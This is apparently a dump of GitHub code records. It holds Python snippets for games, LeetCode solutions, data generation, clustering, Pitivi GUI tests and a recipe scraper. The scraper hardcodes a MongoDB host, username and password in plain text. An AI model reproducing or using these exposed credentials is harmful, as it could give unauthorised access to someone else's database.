p.display.flip()\n \n # Logic that checks what type of game are we playing\n # It also checks when the left mouse click is pressed and where\n if ttt.human == True and ttt.end == False:\n for event in p.event.get():\n if event.type == p.QUIT:\n ttt.playing = False\n \n elif event.type == p.MOUSEBUTTONDOWN and event.button == 1:\n ttt.mouse[0], ttt.mouse[1] = p.mouse.get_pos()\n getSpot(ttt)\n playVShuman(ttt)\n \n elif event.type == p.MOUSEBUTTONDOWN and event.button == 3:\n if ttt.end == True:\n newGame(ttt)\n \n drawXO(ttt, scr)\n scr.screen.blit(scr.buffer, (0, 0)) \n p.display.flip()\n \n elif ttt.dpc == True and ttt.end == False:\n if ttt.x == True:\n playVSdpc(ttt)\n \n for event in p.event.get():\n if event.type == p.QUIT:\n ttt.playing = False\n \n elif event.type == p.MOUSEBUTTONDOWN and event.button == 1:\n ttt.mouse[0], ttt.mouse[1] = p.mouse.get_pos()\n getSpot(ttt)\n playVSdpc(ttt)\n \n elif event.type == p.MOUSEBUTTONDOWN and event.button == 3:\n if ttt.end == True:\n newGame(ttt)\n \n drawXO(ttt, scr)\n scr.screen.blit(scr.buffer, (0, 0)) \n p.display.flip()\n \n elif ttt.spc == True and ttt.end == False:\n if ttt.x == True:\n playVSspc(ttt)\n \n for event in p.event.get():\n if event.type == p.QUIT:\n ttt.playing = False\n \n elif event.type == p.MOUSEBUTTONDOWN and event.button == 1:\n ttt.mouse[0], ttt.mouse[1] = p.mouse.get_pos()\n getSpot(ttt)\n playVSspc(ttt)\n \n elif event.type == p.MOUSEBUTTONDOWN and event.button == 3:\n if ttt.end == True:\n newGame(ttt)\n \n drawXO(ttt, scr)\n scr.screen.blit(scr.buffer, (0, 0)) \n p.display.flip()\n \n elif ttt.end == True:\n for event in p.event.get():\n if event.type == p.QUIT:\n ttt.playing = False\n \n elif event.type == p.MOUSEBUTTONDOWN and event.button == 3:\n if ttt.end == True:\n newGame(ttt)\n \n drawXO(ttt, scr)\n scr.screen.blit(scr.buffer, (0, 0)) \n p.display.flip() \n \n p.quit()\n ","repo_name":"WolfComrad/CMPS-455-555","sub_path":"Fall 2023/Slavco Stevic's TicTacToe/GameGraphics.py","file_name":"GameGraphics.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"13710310","text":"import datetime\nimport random\nfrom dataclasses import dataclass\n\nfrom fake import fake\n\n\n@dataclass\nclass ConferenceBooking:\n TABLE = 'conference_booking'\n ID = 0\n\n id: int\n conference_id: int\n client_id: int\n booking_date: datetime\n\n @staticmethod\n def __post_init__():\n ConferenceBooking.ID += 1\n\n @staticmethod\n def random(db):\n result = []\n for cl in random.choices(db.client, k=int(len(db.client) // 1.2)):\n for conf in random.choices(db.conference, k=random.randint(0, 3)):\n date = None\n for cd in db.conference_day:\n if cd.conference_id == conf.id:\n date = cd.start_date\n break\n\n if date > datetime.datetime.now():\n date = datetime.datetime.now()\n\n date_before = date - datetime.timedelta(weeks=20)\n\n result.append(ConferenceBooking(\n ConferenceBooking.ID,\n conf.id,\n cl.id,\n fake.date_time_between(\n start_date=date_before,\n end_date=date)))\n\n return result\n","repo_name":"piotrek-szczygiel/conferences-sql-generator","sub_path":"table/conference_booking.py","file_name":"conference_booking.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"24391211230","text":"# Author :lixinhao\n\nimport random\ndef roll_s(numbers = 3,s_list = None):\n print('<<>>')\n if s_list is None:\n s_list = []\n while numbers > 0:\n s = random.randrange(1,7)\n s_list.append(s)\n numbers = numbers - 1\n return s_list\n\ndef roll_b(tt):\n big = 11 <= tt <= 18\n small = 3 <= tt <= 10\n if big:\n return '大'\n elif small:\n return '小'\n\ndef game_s():\n money = 1000\n while money > 0:\n print('<<<游戏开始!>>>')\n c = ['大', '小']\n input_c = input('请输入大或小:')\n if input_c in c:\n tt = sum(roll_s())\n win = input_c == roll_b(tt)\n money_c = int(input('请输入押注金额:'))\n if win:\n print('点数',tt,'你赢了')\n money = money + money_c\n print('剩余金额:{}'.format(money))\n else:\n print('点数',tt,'你输了')\n money = money - money_c\n print('剩余金额:{}'.format(money))\n else:\n print('不符合条件,重新输入')\n print('游戏结束')\ngame_s()","repo_name":"shumeng283/record","sub_path":"押注骰子.py","file_name":"押注骰子.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"35439485080","text":"import heapq\ndef solution(operations):\n heap = []\n maxheap = []\n visit = [0]*1000001\n n = len(operations)\n for i in range(n):\n in_de, num = operations[i].split()\n if in_de == 'I':\n heapq.heappush(heap, (int(num), i))\n heapq.heappush(maxheap, (-1 * int(num), i))\n visit[i] = 1\n elif num == '1':\n while maxheap and visit[maxheap[0][1]]==0:\n heapq.heappop(maxheap)\n if maxheap:\n visit[maxheap[0][1]] = 0\n heapq.heappop(maxheap)\n else:\n while heap and visit[heap[0][1]] == 0:\n heapq.heappop(heap)\n if heap:\n visit[heap[0][1]] = 0\n heapq.heappop(heap)\n while maxheap and visit[maxheap[0][1]] == 0:\n heapq.heappop(maxheap)\n while heap and visit[heap[0][1]] == 0:\n heapq.heappop(heap)\n if maxheap and heap:\n answer = [-maxheap[0][0], heap[0][0]]\n return answer\n else:\n return[0, 0]\n","repo_name":"Mingdoo/coding_test_boom","sub_path":"211031/승영/이중우선순위큐/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"36625126789","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def largestValues(self, root):\n res = []\n def dfs(curr,curHeight):\n if not curr:\n return\n if curHeight == len(res):\n res.append(curr.val)\n else:\n res[curHeight] = max(res[curHeight],curr.val)\n dfs(curr.left, curHeight + 1)\n dfs(curr.right, curHeight + 1)\n dfs(root,0)\n return res\n\n","repo_name":"random-char1198/al-go-rithm","sub_path":"leetcode/tree/find_larget_value_in_each_tree_row_515.py","file_name":"find_larget_value_in_each_tree_row_515.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"38349212348","text":"import re\r\n\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib import request\r\nimport pymongo\r\nimport sys\r\n\r\nclear_database = False\r\nurl_main = \"17851\"\r\n\r\n# some sites close their content for 'bots', so user-agent must be supplied\r\nHEADERS = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'\r\n}\r\n\r\ndef acceptedIngredients():\r\n\treturn [item[:-1] for item in open(\"res/ingredients.txt\")]\r\n\r\ndef ignoreIngredients():\r\n return [item[:-1] for item in open(\"res/ignore_words.txt\")]\r\n\r\ndef singleConversionDict():\r\n\titem_dict = dict()\r\n\tfor item in open(\"res/ingredients_mass.txt\"):\r\n\t\tline = item.split(',')\r\n\t\tif item and item[0] != '#' and len(line)>1:\r\n\t\t\titem_dict[line[0]] = float(line[1])\r\n\treturn item_dict\r\n\r\ndef cupConversionDict():\r\n\titem_dict = dict()\r\n\tfor item in open(\"res/cup_conversion.txt\"):\r\n\t\tline=item.split(',')\r\n\t\tif item and item[0] != '#' and len(line)>1:\r\n\t\t\titem_dict[line[0]] = float(line[1])\r\n\treturn item_dict\r\n\r\n\r\nif len(sys.argv) > 1:\r\n\turl_main = sys.argv[1]\r\nDB_NAME = 'heroku_w26bwb75' \r\nDB_HOST = 'ds129030.mlab.com'\r\nDB_PORT = 29030\r\nDB_USER = 'heroku_w26bwb75'\r\nDB_PASS = 'i8jeeblr2rai5ab8h8n4ts7to3'\r\n\r\nconnection = pymongo.MongoClient(DB_HOST, DB_PORT)\r\ndb = connection[DB_NAME]\r\ndb.authenticate(DB_USER, DB_PASS)\r\n\r\nrecipe_collection = db['recipes']\r\ningredient_collection = db['ingredients']\r\n#ingredient_collection.create_index( 'ingredient' )\r\n\r\nif clear_database:\r\n recipe_collection.delete_many({})\r\n ingredient_collection.delete_many({})\r\n\r\nall_recipes = []\r\n\r\nfor k in list(recipe_collection.find()):\r\n\tall_recipes.append(k['recipe'])\r\n\r\nitems = acceptedIngredients()\r\nsingle_weight = singleConversionDict()\r\ncup_conversion = cupConversionDict()\r\nignore = ignoreIngredients()\r\n\r\nprint(ignore)\r\n\r\ndef normalize_string(string):\r\n return re.sub(\r\n r'\\s+', ' ',\r\n string.replace(\r\n '\\xa0', ' ').replace( #  \r\n '\\n', ' ').replace(\r\n '\\t', ' ').strip()\r\n )\r\n\r\n\r\ndef processIngredient(recipe, item, amount):\r\n\t\r\n\tingredient_collection.insert_one(\r\n\t\t{\r\n\t\t\t\"recipe\": recipe,\r\n\t\t\t\"ingredient\": item.lower(),\r\n\t\t\t\"mass\": amount\r\n\t\t}\r\n\t)\r\n\r\ndef addRecipe(name, URL, serving, count):\r\n\trecipe_collection.insert_one(\r\n {\r\n \"recipe\": name,\r\n \"url\": URL,\r\n \"serving\": serving,\r\n\t\t\t\"num_ingred\": count\r\n }\r\n )\r\n\r\ndef addToDatabase(name, all_ingredients, URL, serving):\r\n\tcount = 0\r\n\tfor i in all_ingredients:\r\n\t\tfor ingredient in items:\r\n\t\t\tif ingredient.lower() in i.lower():\r\n\t\t\t\t\r\n\t\t\t\tounce = re.search('(?<=\\()[0-9]+.*[0-9]*(?= *ounce)', i)\r\n\t\t\t\tamount = 0.\r\n\t\t\t\tif ounce:\r\n\t\t\t\t\tamount = float(ounce.group()) * 28.35\r\n\t\t\t\telse:\r\n\t\t\t\t\tcup = re.search('[0-9]+ *[0-9]*/*[0-9]*(?= *cup)', i)\r\n\t\t\t\t\tif cup and ingredient.lower() in cup_conversion:\r\n\t\t\t\t\t\tdigits = cup.group().split(\" \")\r\n\t\t\t\t\t\tval = 0\r\n\t\t\t\t\t\tfract = digits[0]\r\n\t\t\t\t\t\tif len(digits) == 2:\r\n\t\t\t\t\t\t\tfract = digits[1]\r\n\t\t\t\t\t\t\tval += float(digits[0])\r\n\t\t\t\t\t\tfract_list = fract.split(\"/\")\r\n\t\t\t\t\t\tif len(fract_list)==2:\r\n\t\t\t\t\t\t\tval += float(fract_list[0])/float(fract_list[1])\r\n\t\t\t\t\t\telif fract:\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tval += float(fract)\r\n\t\t\t\t\t\tamount = cup_conversion[ingredient.lower()] * val\r\n\t\t\t\t\telif cup:\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tb_ignore = False\r\n\t\t\t\t\t\tfor ignore_i in ignore:\r\n\t\t\t\t\t\t\tif ignore_i in i.lower():\r\n\t\t\t\t\t\t\t\tb_ignore = True\r\n\t\t\t\t\t\tif b_ignore:\r\n\t\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\tamount = int(re.search(r'\\d+', i).group())\r\n\t\t\t\t\t\tfor single_item in single_weight:\r\n\t\t\t\t\t\t\tif single_item.lower() in i.lower():\r\n\t\t\t\t\t\t\t\tamount = single_weight[single_item] * amount\r\n\t\t\t\t\r\n\t\t\t\tprocessIngredient(name, ingredient, amount)\r\n\t\t\t\tcount += 1\r\n\t\t\t\tbreak\r\n\tif count > 0:\r\n\t\taddRecipe(name, URL, serving, count)\r\n\r\ndef getInfo(URL):\r\n\tsoup = BeautifulSoup(request.urlopen(\r\n request.Request(URL, headers=HEADERS)).read(), \"html.parser\")\r\n\tname = soup.find('h1').get_text()\r\n\r\n\tif name in all_recipes:\r\n\t\treturn\r\n\r\n\tingredients_html = soup.findAll('li', {'class': \"checkList__line\"})\r\n\tingredient_list = [ normalize_string(ingredient.get_text()) \r\n\tfor ingredient in ingredients_html\r\n\t if ingredient.get_text(strip=True) not in ('Add all ingredients to list', '','Advertisement') ]\r\n\tserving_html = soup.findAll('meta', {'id': \"metaRecipeServings\"})\r\n\tserving = serving_html[0].get(\"content\")\r\n\taddToDatabase(name, ingredient_list, URL, serving)\r\n\tall_recipes.append(name)\r\n\treturn ingredient_list\r\n\r\nsoup = BeautifulSoup(request.urlopen(\r\n request.Request(\"http://allrecipes.com/recipes/\" + url_main, headers=HEADERS)).read(), \"html.parser\")\r\n\r\ntopRecipes = soup.findAll('ar-save-item', {'class': \"favorite\"})\r\n\r\n#print(topRecipes[0])\r\n\r\nrecipe_list = []\r\n\r\nfor recipe_web in topRecipes:\r\n\trecipe_list.append(recipe_web.get(\"data-id\"))\r\n\r\n#recipe_list = ['103737']\r\n\r\nfor recipe_id in recipe_list:\r\n\tprint(recipe_id)\r\n\ttarget_url = 'http://allrecipes.com/recipe/' + recipe_id\r\n\tscrap = getInfo(target_url)\r\n\t#print(scrap)\r\n\t#input()\r\n\r\n\r\n","repo_name":"welll5678/turnip_beats_server","sub_path":"Py3Scraper.py","file_name":"Py3Scraper.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10571279905","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution(object):\n\n def binaryTreePaths(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[str]\n \"\"\"\n sol = []\n if not root:\n return sol\n\n def __dfs__(node, curr):\n if node is None:\n return\n\n if not node.left and not node.right:\n s = str(curr[0].val)\n for x in curr[1:]:\n tmp = \"->\" + str(x.val)\n s += tmp\n sol.append(s)\n\n for x in [node.left, node.right]:\n curr.append(x)\n __dfs__(x, curr)\n curr.pop()\n\n curr = [root]\n __dfs__(root, curr)\n return sol\n","repo_name":"pagenotfound4o4/py_leetcode","sub_path":"tree/binary-tree-paths.py","file_name":"binary-tree-paths.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"39187459555","text":"import pandas as pd\r\n\r\ndata = pd.read_csv(\"C:/Users/Jeffr/Desktop/Intern - Pantech Solutions/Days/Day 20/20_ClusterringIncomeSpentusingHierarchialClusterring/dataset.csv\")\r\ndata\r\n\r\ndata = data.drop([\"CustomerID\"],axis=1)\r\nprint(data.shape)\r\nprint(data.head())\r\nprint(data.describe())\r\n\r\nprint(data.isnull().sum())\r\n\r\n#Label Encoding\r\n\r\nfrom sklearn.preprocessing import LabelEncoder\r\nlabel_encoder = LabelEncoder()\r\ndata[\"Gender\"] = label_encoder.fit_transform(data[\"Gender\"])\r\n\r\nprint(data[\"Gender\"])\r\n\r\nfrom sklearn.cluster import AgglomerativeClustering\r\nmodel = AgglomerativeClustering(n_clusters=5, affinity=\"euclidean\", linkage=\"average\")\r\ny_means = model.fit_predict(data)\r\ny_means\r\n\r\nimport matplotlib.pyplot as plt\r\nimport scipy.cluster.hierarchy as cluster\r\n\r\nplt.figure(1, figsize=(16,8))\r\ndendrogram = cluster.dendrogram(cluster.linkage(data, method=\"ward\"))\r\n\r\nplt.title(\"Dendrogram Tree Graph\")\r\nplt.xlabel(\"Customers\")\r\nplt.ylabel(\"Distances\")\r\nplt.show()\r\n\r\n\r\nX = data.iloc[:,[2,3]].values\r\nX\r\n\r\n\r\nplt.scatter(X[y_means==0,0], X[y_means==0,1], s=50, c=\"purple\", label = \"Cluster 1\")\r\nplt.scatter(X[y_means==1,0], X[y_means==1,1], s=50, c=\"blue\", label = \"Cluster 2\")\r\nplt.scatter(X[y_means==2,0], X[y_means==2,1], s=50, c=\"red\", label = \"Cluster 3\")\r\nplt.scatter(X[y_means==3,0], X[y_means==3,1], s=50, c=\"yellow\", label = \"Cluster 4\")\r\nplt.scatter(X[y_means==4,0], X[y_means==4,1], s=50, c=\"cyan\", label = \"Cluster 5\")\r\n\r\nplt.title(\"Income Spent Analysis - Hierarchial Clustering\")\r\nplt.xlabel(\"Income\")\r\nplt.ylabel(\"Spent\")\r\nplt.show()\r\n\r\n\r\n\r\n\r\n","repo_name":"jeffryjames/Machine_Learning","sub_path":"Unsupervised Learning/Hierarchial Clustering_Income_spent_analysis.py","file_name":"Hierarchial Clustering_Income_spent_analysis.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15438840119","text":"import tempfile\nfrom unittest import mock\n\nfrom gi.repository import GES\nfrom gi.repository import Gst\n\nfrom tests import common\n\n\nclass TransformationPropertiesTest(common.TestCase):\n \"\"\"Tests for the TransformationProperties widget.\"\"\"\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_spin_buttons_read(self):\n \"\"\"Checks the spin buttons update when the source properties change.\"\"\"\n timeline = self.transformation_box.app.gui.editor.timeline_ui.timeline\n spin_buttons = self.transformation_box.spin_buttons\n\n # Add a clip and select it\n clip = self.add_clips_simple(timeline, 1)[0]\n timeline.selection.select([clip])\n\n # Check that spin buttons display the correct values by default\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n self.assertIn(prop, spin_buttons)\n ret, source_value = source.get_child_property(prop)\n self.assertTrue(ret)\n spin_btn_value = spin_buttons[prop].get_value_as_int()\n self.assertEqual(spin_btn_value, source_value)\n\n # Change the source properties and check the spin buttons update\n # correctly.\n new_values = {\"posx\": 20, \"posy\": -50, \"width\": 70, \"height\": 450}\n for prop, new_val in new_values.items():\n self.assertTrue(source.set_child_property(prop, new_val))\n spin_btn_value = spin_buttons[prop].get_value_as_int()\n self.assertEqual(new_val, spin_btn_value)\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_clip_size_aspect_ratio_lock(self):\n \"\"\"Checks if aspect ratio is maintained when clip size is linked.\"\"\"\n # Add a clip and select it\n clip = self.add_clips_simple(self.timeline_container.timeline, 1)[0]\n self.timeline_container.timeline.selection.select([clip])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n\n self._check_aspect_ratio_constraining(source, initial_size=(960, 400), width=1440, height=None, expected_width=None, expected_height=600)\n self._check_aspect_ratio_constraining(source, initial_size=(320, 240), width=None, height=720, expected_width=960, expected_height=None)\n self._check_aspect_ratio_constraining(source, initial_size=(100, 100), width=25, height=None, expected_width=None, expected_height=25)\n\n def _check_aspect_ratio_constraining(self, source, initial_size, width, height, expected_width, expected_height):\n width_spin = self.transformation_box.spin_buttons[\"width\"]\n height_spin = self.transformation_box.spin_buttons[\"height\"]\n width_spin.set_value(initial_size[0])\n height_spin.set_value(initial_size[1])\n\n # Lock the aspect ratio.\n self.clipproperties.transformation_expander._aspect_ratio_button_clicked_cb(None)\n self.assertIsNotNone(self.clipproperties.transformation_expander._aspect_ratio)\n\n # Make a change to one of the spin button's value.\n if width is not None:\n width_spin.set_value(width)\n expected_width = width\n if height is not None:\n height_spin.set_value(height)\n expected_height = height\n self.assertEqual(source.get_child_property(\"width\"), (True, expected_width))\n self.assertEqual(source.get_child_property(\"height\"), (True, expected_height))\n\n # Unlock the aspect ratio.\n self.clipproperties.transformation_expander._aspect_ratio_button_clicked_cb(None)\n self.assertIsNone(self.clipproperties.transformation_expander._aspect_ratio)\n\n # Change the width independently.\n width_spin.set_value(expected_width * 2)\n self.assertEqual(source.get_child_property(\"width\"), (True, expected_width * 2))\n self.assertEqual(source.get_child_property(\"height\"), (True, expected_height))\n\n # Change the height independently.\n height_spin.set_value(expected_height * 4)\n self.assertEqual(source.get_child_property(\"width\"), (True, expected_width * 2))\n self.assertEqual(source.get_child_property(\"height\"), (True, expected_height * 4))\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_spin_buttons_write(self):\n \"\"\"Checks the spin buttons changing updates the source properties.\"\"\"\n timeline = self.transformation_box.app.gui.editor.timeline_ui.timeline\n spin_buttons = self.transformation_box.spin_buttons\n\n # Add a clip and select it\n clip = self.add_clips_simple(timeline, 1)[0]\n timeline.selection.select([clip])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n\n # Get current spin buttons values\n current_spin_values = {}\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n current_spin_values[prop] = spin_buttons[prop].get_value_as_int()\n\n changes = [\n (\"posx\", -300), (\"posy\", 450), (\"width\", 1), (\"height\", 320),\n (\"posx\", 230), (\"posx\", 520), (\"posy\", -10), (\"posy\", -1000),\n (\"width\", 600), (\"width\", 1000), (\"height\", 1), (\"height\", 1000)\n ]\n\n # Change the spin buttons values and check the source properties are\n # updated correctly.\n for prop, new_value in changes:\n spin_buttons[prop].set_value(new_value)\n current_spin_values[prop] = new_value\n for source_prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n ret, source_value = source.get_child_property(source_prop)\n self.assertTrue(ret)\n self.assertEqual(current_spin_values[source_prop], source_value)\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_spin_buttons_source_change(self):\n \"\"\"Checks the spin buttons update when the selected clip changes.\"\"\"\n timeline = self.transformation_box.app.gui.editor.timeline_ui.timeline\n spin_buttons = self.transformation_box.spin_buttons\n\n # Add two clips and select the first one\n clips = self.add_clips_simple(timeline, 2)\n timeline.selection.select([clips[0]])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n\n # Change the spin buttons values\n new_values = {\"posx\": 45, \"posy\": 10, \"width\": 450, \"height\": 25}\n for prop, new_val in new_values.items():\n spin_buttons[prop].set_value(new_val)\n\n # Select the second clip and check the spin buttons values update\n # correctly\n timeline.selection.select([clips[1]])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n ret, source_value = source.get_child_property(prop)\n self.assertTrue(ret)\n self.assertEqual(spin_buttons[prop].get_value_as_int(), source_value)\n\n # Select the first clip again and check spin buttons values\n timeline.selection.select([clips[0]])\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n self.assertEqual(spin_buttons[prop].get_value_as_int(), new_values[prop])\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_keyframes_activate(self):\n \"\"\"Checks transformation properties keyframes activation.\"\"\"\n timeline = self.transformation_box.app.gui.editor.timeline_ui.timeline\n\n # Add a clip and select it\n clip = self.add_clips_simple(timeline, 1)[0]\n timeline.selection.select([clip])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n inpoint = source.props.in_point\n duration = source.props.duration\n\n # Check keyframes are deactivated by default\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n self.assertIsNone(source.get_control_binding(prop))\n\n # Get current source properties\n initial_values = {}\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n ret, value = source.get_child_property(prop)\n self.assertTrue(ret)\n initial_values[prop] = value\n\n # Activate keyframes and check the default keyframes are created\n self.transformation_box._activate_keyframes_btn.set_active(True)\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n control_binding = source.get_control_binding(prop)\n self.assertIsNotNone(control_binding)\n control_source = control_binding.props.control_source\n keyframes = [(item.timestamp, item.value) for item in control_source.get_all()]\n self.assertEqual(keyframes, [(inpoint, initial_values[prop]),\n (inpoint + duration, initial_values[prop])])\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_keyframes_add(self):\n \"\"\"Checks keyframe creation.\"\"\"\n timeline = self.transformation_box.app.gui.editor.timeline_ui.timeline\n pipeline = timeline._project.pipeline\n spin_buttons = self.transformation_box.spin_buttons\n\n # Add a clip and select it\n clip = self.add_clips_simple(timeline, 1)[0]\n timeline.selection.select([clip])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n start = source.props.start\n inpoint = source.props.in_point\n duration = source.props.duration\n\n # Activate keyframes\n self.transformation_box._activate_keyframes_btn.set_active(True)\n\n # Add some more keyframes\n offsets = [1, int(duration / 2), duration - 1]\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n for index, offset in enumerate(offsets):\n timestamp, value = inpoint + offset, offset * 10\n with mock.patch.object(pipeline, \"get_position\") as get_position:\n get_position.return_value = start + offset\n spin_buttons[prop].set_value(value)\n\n control_source = source.get_control_binding(prop).props.control_source\n keyframes = [(item.timestamp, item.value) for item in control_source.get_all()]\n self.assertEqual((timestamp, value), keyframes[index + 1])\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_keyframes_navigation(self):\n \"\"\"Checks keyframe navigation.\"\"\"\n timeline = self.transformation_box.app.gui.editor.timeline_ui.timeline\n pipeline = timeline._project.pipeline\n\n # Add a clip and select it\n clip = self.add_clips_simple(timeline, 1)[0]\n timeline.selection.select([clip])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n start = source.props.start\n inpoint = source.props.in_point\n duration = source.props.duration\n\n # Activate keyframes and add some more keyframes\n self.transformation_box._activate_keyframes_btn.set_active(True)\n offsets = [1, int(duration / 2), duration - 1]\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n for offset in offsets:\n timestamp, value = inpoint + offset, offset * 10\n control_source = source.get_control_binding(prop).props.control_source\n control_source.set(timestamp, value)\n\n # Add edge keyframes in the offsets array\n offsets.insert(0, 0)\n offsets.append(duration)\n\n # Test keyframe navigation\n prev_index = 0\n next_index = 1\n for position in range(duration + 1):\n prev_keyframe_ts = offsets[prev_index] + inpoint\n next_keyframe_ts = offsets[next_index] + inpoint\n\n with mock.patch.object(pipeline, \"get_position\") as get_position:\n get_position.return_value = start + position\n with mock.patch.object(pipeline, \"simple_seek\") as simple_seek:\n self.transformation_box._prev_keyframe_btn.clicked()\n simple_seek.assert_called_with(prev_keyframe_ts)\n self.transformation_box._next_keyframe_btn.clicked()\n simple_seek.assert_called_with(next_keyframe_ts)\n\n if position + 1 == next_keyframe_ts and next_index + 1 < len(offsets):\n next_index += 1\n if position in offsets and position != 0:\n prev_index += 1\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_reset_to_default(self):\n \"\"\"Checks \"reset to default\" button.\"\"\"\n timeline = self.transformation_box.app.gui.editor.timeline_ui.timeline\n\n # Add a clip and select it\n clip = self.add_clips_simple(timeline, 1)[0]\n timeline.selection.select([clip])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n\n # Change source properties\n new_values = {\"posx\": 20, \"posy\": -50, \"width\": 70, \"height\": 450}\n for prop, new_val in new_values.items():\n self.assertTrue(source.set_child_property(prop, new_val))\n\n # Activate keyframes\n self.transformation_box._activate_keyframes_btn.set_active(True)\n\n # Press \"reset to default\" button\n clear_button = self.transformation_box.builder.get_object(\"clear_button\")\n clear_button.clicked()\n\n # Check that control bindings were erased and the properties were\n # reset to their default values\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n self.assertIsNone(source.get_control_binding(prop))\n ret, value = source.get_child_property(prop)\n self.assertTrue(ret)\n self.assertEqual(value, source.ui.default_position[prop])\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_operator(self):\n timeline = self.app.gui.editor.timeline_ui.timeline\n\n clip, = self.add_clips_simple(timeline, 1)\n timeline.selection.select([clip])\n source = self.compositing_box._video_source\n self.assertIsNotNone(source)\n ret, value = source.get_child_property(\"operator\")\n self.assertEqual((ret, value.value_nick), (True, \"over\"))\n\n self.compositing_box.blending_combo.set_active_id(\"source\")\n ret, value = source.get_child_property(\"operator\")\n self.assertEqual((ret, value.value_nick), (True, \"source\"))\n\n self.compositing_box.blending_combo.set_active_id(\"over\")\n ret, value = source.get_child_property(\"operator\")\n self.assertEqual((ret, value.value_nick), (True, \"over\"))\n\n self.app.action_log.undo()\n ret, value = source.get_child_property(\"operator\")\n self.assertEqual((ret, value.value_nick), (True, \"source\"))\n\n self.app.action_log.undo()\n ret, value = source.get_child_property(\"operator\")\n self.assertEqual((ret, value.value_nick), (True, \"over\"))\n\n self.app.action_log.redo()\n ret, value = source.get_child_property(\"operator\")\n self.assertEqual((ret, value.value_nick), (True, \"source\"))\n\n self.app.action_log.redo()\n ret, value = source.get_child_property(\"operator\")\n self.assertEqual((ret, value.value_nick), (True, \"over\"))\n\n\nclass TitlePropertiesTest(common.TestCase):\n \"\"\"Tests for the TitleProperties class.\"\"\"\n\n def _get_title_source_child_props(self):\n clips = self.layer.get_clips()\n self.assertEqual(len(clips), 1, clips)\n self.assertIsInstance(clips[0], GES.TitleClip)\n source, = clips[0].get_children(False)\n return {p: source.get_child_property(p)\n for p in (\"text\",\n \"x-absolute\", \"y-absolute\",\n \"valignment\", \"halignment\",\n \"font-desc\",\n \"color\",\n \"foreground-color\",\n \"outline-color\",\n \"draw-shadow\")}\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_create_title(self):\n \"\"\"Exercise creating a title clip.\"\"\"\n self.project.pipeline.get_position = mock.Mock(return_value=0)\n\n self.clipproperties.create_title_clip_cb(None)\n properties1 = self._get_title_source_child_props()\n self.assertTrue(properties1[\"text\"][0])\n self.assertNotEqual(properties1[\"text\"][1], \"\", \"Title clip does not have an initial text\")\n\n self.action_log.undo()\n clips = self.layer.get_clips()\n self.assertEqual(len(clips), 0, clips)\n\n self.action_log.redo()\n properties2 = self._get_title_source_child_props()\n self.assertDictEqual(properties1, properties2)\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_modify_title(self):\n \"\"\"Exercise modifying the title.\"\"\"\n self.project.pipeline.get_position = mock.Mock(return_value=0)\n\n self.clipproperties.create_title_clip_cb(None)\n properties1 = self._get_title_source_child_props()\n\n # Modify the title.\n mod_title = \"Modifed Title\"\n self.clipproperties.title_expander.textbuffer.props.text = mod_title\n properties2 = self._get_title_source_child_props()\n self.assertEqual(properties2[\"text\"], (True, mod_title))\n 